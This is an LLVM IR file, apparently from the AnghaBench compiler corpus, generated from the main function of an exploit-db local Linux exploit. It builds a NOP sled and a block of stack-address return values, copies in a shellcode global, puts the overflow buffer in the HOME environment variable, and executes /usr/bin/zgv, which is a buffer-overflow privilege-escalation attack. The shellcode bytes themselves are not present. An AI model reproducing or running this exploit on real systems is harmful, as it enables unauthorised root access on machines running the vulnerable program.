; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_339.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_339.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@bufsize = common dso_local global i32 0, align 4
@buffer = common dso_local global i64* null, align 8
@shellcode = common dso_local global i32 0, align 4
@.str = private unnamed_addr constant [5 x i8] c"HOME\00", align 1
@.str.1 = private unnamed_addr constant [13 x i8] c"/usr/bin/zgv\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main() #0 {
  %1 = alloca i32, align 4
  %2 = alloca i32, align 4
  store i32 0, i32* %1, align 4
  store i32 0, i32* %2, align 4
  br label %3

3:                                                ; preds = %16, %0
  %4 = load i32, i32* %2, align 4
  %5 = load i32, i32* @bufsize, align 4
  %6 = sub nsw i32 %5, 4
  %7 = icmp slt i32 %4, %6
  br i1 %7, label %8, label %19

8:                                                ; preds = %3
  %9 = call i8* (...) @get_sp()
  %10 = getelementptr inbounds i8, i8* %9, i64 -4675
  %11 = load i64*, i64** @buffer, align 8
  %12 = load i32, i32* %2, align 4
  %13 = sext i32 %12 to i64
  %14 = getelementptr inbounds i64, i64* %11, i64 %13
  %15 = bitcast i64* %14 to i8**
  store i8* %10, i8** %15, align 8
  br label %16

16:                                               ; preds = %8
  %17 = load i32, i32* %2, align 4
  %18 = add nsw i32 %17, 4
  store i32 %18, i32* %2, align 4
  br label %3

19:                                               ; preds = %3
  %20 = load i64*, i64** @buffer, align 8
  %21 = call i32 @memset(i64* %20, i32 144, i32 512)
  %22 = load i64*, i64** @buffer, align 8
  %23 = getelementptr inbounds i64, i64* %22, i64 512
  %24 = load i32, i32* @shellcode, align 4
  %25 = load i32, i32* @shellcode, align 4
  %26 = call i32 @strlen(i32 %25)
  %27 = call i32 @memcpy(i64* %23, i32 %24, i32 %26)
  %28 = load i64*, i64** @buffer, align 8
  %29 = load i32, i32* @bufsize, align 4
  %30 = sub nsw i32 %29, 1
  %31 = sext i32 %30 to i64
  %32 = getelementptr inbounds i64, i64* %28, i64 %31
  store i64 0, i64* %32, align 8
  %33 = load i64*, i64** @buffer, align 8
  %34 = call i32 @setenv(i8* getelementptr inbounds ([5 x i8], [5 x i8]* @.str, i64 0, i64 0), i64* %33, i32 1)
  %35 = call i32 @execl(i8* getelementptr inbounds ([13 x i8], [13 x i8]* @.str.1, i64 0, i64 0), i8* getelementptr inbounds ([13 x i8], [13 x i8]* @.str.1, i64 0, i64 0), i32* null)
  %36 = load i32, i32* %1, align 4
  ret i32 %36
}

declare dso_local i8* @get_sp(...) #1

declare dso_local i32 @memset(i64*, i32, i32) #1

declare dso_local i32 @memcpy(i64*, i32, i32) #1

declare dso_local i32 @strlen(i32) #1

declare dso_local i32 @setenv(i8*, i64*, i32) #1

declare dso_local i32 @execl(i8*, i8*, i32*) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
